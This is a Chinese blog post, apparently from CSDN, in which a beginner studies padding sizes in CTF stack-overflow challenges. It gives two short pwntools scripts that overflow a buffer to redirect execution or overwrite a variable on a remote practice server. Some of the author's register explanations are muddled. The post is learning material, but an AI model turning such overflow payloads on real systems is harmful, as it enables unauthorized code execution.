pwn(2) 愚人发现了pwn的有趣之处 对于填充大小的研究

最新推荐文章于 2023-04-18 18:53:45 发布
最新推荐文章于 2023-04-18 18:53:45 发布
阅读量260 收藏 1
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/brightendavid/article/details/116564273
版权 
#python3 
from pwn import *

p = remote('node3.buuoj.cn', '25822')
payload = b'b' * (0x40+8)+ p64(0x40060D)
p.sendline(payload)

p.interactive()

抄了几个wp,一直很奇怪为什么这个填充的字符数量为什么规则不一样。

比如上面的填充规则是输入的字符大小+EBP大小

因为是64位的系统所以EBP大小是8,而前面的0x40是64位,也就是此处输入的字符大小。

后面的0x40060D是栈帧头,再push ebp就是system(**)命令了。

需要的就是再+ebp的大小,以达到eip,eip里面放的是system(**)的地址。
这样合理性就很 充分了。


#python3 
from pwn import *

p=remote('xxxxxxxxxx',xxxxx)

payload='I'*(0x30-0x04)+p32(0b01000001001101001000000000000000)

p.recvuntil('Let\'s guess the number.')

p.sendline(payload)

p.interactive()

而此处目的是修改
覆盖的是var_4
在这里插入图片描述
在内存中,这些变量是线性存放的,就如下图所示。
我们的输入就是var_30。目的是填充到var_4的位置。
做一个溢出吧。
这些数据的基准是rbp,rbp是什么?好像没有这个寄存器吧。这个东西好像是交寄存器指针什么的。
反正是知道了他们两个变量的相对地址了。
相对地址就是0x30-0x04

payload='I'*(0x30-0x04)+p32(0b01000001001101001000000000000000)

构造payload 。
就是把相差的地址填满。之后加一个p32(0b01000001001101001000000000000000)

0b01000001001101001000000000000000
这个就是某个小数的16进制表示。
在这里插入图片描述
在这里插入图片描述

p64(),p32()函数 主要是对整数进行打包:p32、p64是打包为二进制

原因在于要覆盖的东西不一样。

brightendavid
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn07.ret2syscall例题
11-11
ret2syscall例题
pwn基本ROP——ret2text
turtlesd的博客
04-25 799
ret2text环境原理漏洞分析利用`checksec [file_name]`指令获取可执行文件的保护措施开放情况利用IDA32位进行调试利用pwndbg获取偏移量payload 环境 ret2text 原理 控制主函数的return返回到文件函数中自带的system函数的地址,从而获得最高权限 漏洞分析 利用checksec [file_name]指令获取可执行文件的保护措施开放情况 命令: checksec ret2text 可以看到,该可执行文件是32位的,仅开启了NX堆栈不可执行保护。 也就是
go 函数调用规则(三)
yongbaoii的博客
04-28 493
gogogo
Pwn(整数溢出漏洞)
神隐哥的博客
03-02 1989
漏洞介绍 整数就是没有小数的数字 在计算机中。有符号数用二进制表示。表示负数的时候。将二进制最高为来表示数字的符号,最高为是1就是负数。最高位是0就表是正数 当然。还有无符号数。也就是没有负数。 当我们尝试将一个数字范围为0-255的数字。 输入256时。就会溢出。返回0 输入257时。返回1 当有符号数溢出时。会从最小的值开始,-xxxxx然后依次+1 以下是各类符号范围大小漏洞危害 1: 数据截断 当发生溢出时。数据会被截断。 a\b\r为3个8位无符号整数。范围大小为0-255 a=11111111
python2 和 python3中bytes和str的数据类型以及p32和u32
weixin_43085694的博客
03-31 3165
python3区分bytes 和string这两个数据类型 而python2是没有bytes类型的,是和str混用的 对于同一个地址序列,在python3中用str表示和用bytes,输出的样子会不一样,主要的区别在于不可见字符。 在python3中,要写bytes类型的常量,可以写成b’A’,来表示bytes形式的字符A p32是压缩,返回的是bytes u32是解压 上面两...
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5592
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串函
pwn2own2020:通过链接六个漏洞通过Safari破坏macOS内核
02-04
通过链接六个漏洞通过Safari破坏macOS内核 总览 该存储库包含利用和技术细节,并。 有关更多信息,您还可以查看。 该存储库还包括成功利用。 如何繁殖 ... ... 通过Safari使用攻击者服务器的IP访问网站: ...
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2libc2pwn 入门题
02-11
pwn 入门题
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
buu pwn入门 有栈溢出
Sanntaa的博客
12-03 593
写题笔记
pwn入门(2):ROP攻击的原理,缓冲区溢出漏洞利用(ret2text+ret2shellcode)
Bossfrank的博客
04-18 2409
本节将介绍基本的ROP(Return-Oriented Programming,返回导向编程的)的攻击原理、二进制程序的保护机制,并通过两个实例ret2text、ret2shellcode,为读者简介基本的ROP攻击过程。本节所使用的实例可在CTF wiki上进行下载。
pwn 练习笔记 暑假的第一天
SsMing的博客
07-14 427
pwnable  bof 源码如下#include <stdio.h>#include <string.h>#include <stdlib.h>void func(int key){    char overflowme[32];    printf("overflow me : ");    gets(overflowme);    // smash me!...
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 1843
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
PWN入门(5)32位程序与64位程序和构造ROP链
Ba1_Ma0的博客
09-12 1522
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
跟着CTF-Wiki学pwn|格式化字符串(1)
Kni9hT's Blog
05-19 1843
文章目录格式化字符串漏洞原理介绍格式化字符串函数介绍格式化字符串函数格式化字符串参数格式化字符串漏洞原理格式化字符串漏洞利用程序崩溃泄露内存泄露栈内存获取栈变量数值获取栈变量对应字符串泄露任意地址内存覆盖内存覆盖栈内存确定覆盖地址确定相对偏移进行覆盖覆盖任意地址内存覆盖小数字覆盖大数字 格式化字符串漏洞原理介绍 首先,对格式化字符串漏洞的原理进行简单介绍。 格式化字符串函数介绍 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计
pwn学习(整数溢出)
至臻求学,胸怀云月
01-31 3005
整数溢出 ctf-wiki基础知识 请先浏览上述链接 类型 字节 范围 short int 2byte 0~0x7fff 0x8000~0xffff unsigned short int 2byte 0~0xffff int 4byte 0~0x7fffffff 0x80000000~0xffffffff unsigned int 4byte 0~0xffffffff ...
pwn学习-格式化字符串的利用
WocW的博客
03-08 1928
覆盖栈内存 所用例子 /* example/overflow/overflow.c */ #include <stdio.h> int a = 123, b = 456; int main() { int c = 789; char s[100]; printf("%p\n", &c); scanf("%s", s); printf(s); if...
Pwn基础学习1-[栈溢出]/篇2
m0_52343643的博客
03-29 2208
继上一篇的内容 题目3-ret2syscall 定义 控制程序执行系统调用 原理 不同于之前的 ret2text 和 ret2shellcode 题型,系统调用并不是执行程序中现有的代码或自己写进去的代码,其实就如其字面意思,系统调用就是我们让系统来调用一些函数,那么如何做到让系统来调用,需要满足以下几个条件: 某函数的系统调用号【系统调用号表】—— 放在寄存器 eax 需传入某函数的参数 —— 放在寄存器 ebx、ecx、edx 一个指令 —— int 0x80 int 0x80(软中断)
C#计算PwN 上升延时间
最新发布
06-02
在C#中计算PwN上升延时间,需要先获得PwN信号的上升沿位置和下降沿位置。可以通过比较PwN信号值的变化来实现。 具体步骤如下: 1. 读取PwN信号的数据,可以使用C#中的IO类或者第三方库来读取。 2. 遍历PwN信号数据,找到第一个上升沿位置和第一个下降沿位置。 3. 计算上升延时间,即下降沿位置减去上升沿位置的时间差。 下面是一个示例代码: ``` double[] pwnData = {1, 0, 1, 0, 1, 1, 0, 0, 1, 0}; //PwN信号数据 double upEdgeTime = 0; //上升沿位置 double downEdgeTime = 0; //下降沿位置 for (int i = 1; i < pwnData.Count(); i++) { if (pwnData[i] > pwnData[i - 1]) { upEdgeTime = i; //记录上升沿位置 } else if (pwnData[i] < pwnData[i - 1]) { downEdgeTime = i; //记录下降沿位置 break; //找到第一个下降沿位置,退出循环 } } double riseDelayTime = downEdgeTime - upEdgeTime; //计算上升延时间 Console.WriteLine("PwN上升延时间为:" + riseDelayTime); ``` 需要注意的是,在实际应用中,可能需要对PwN信号进行滤波以去除噪声,或者对信号进行采样以提高精度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值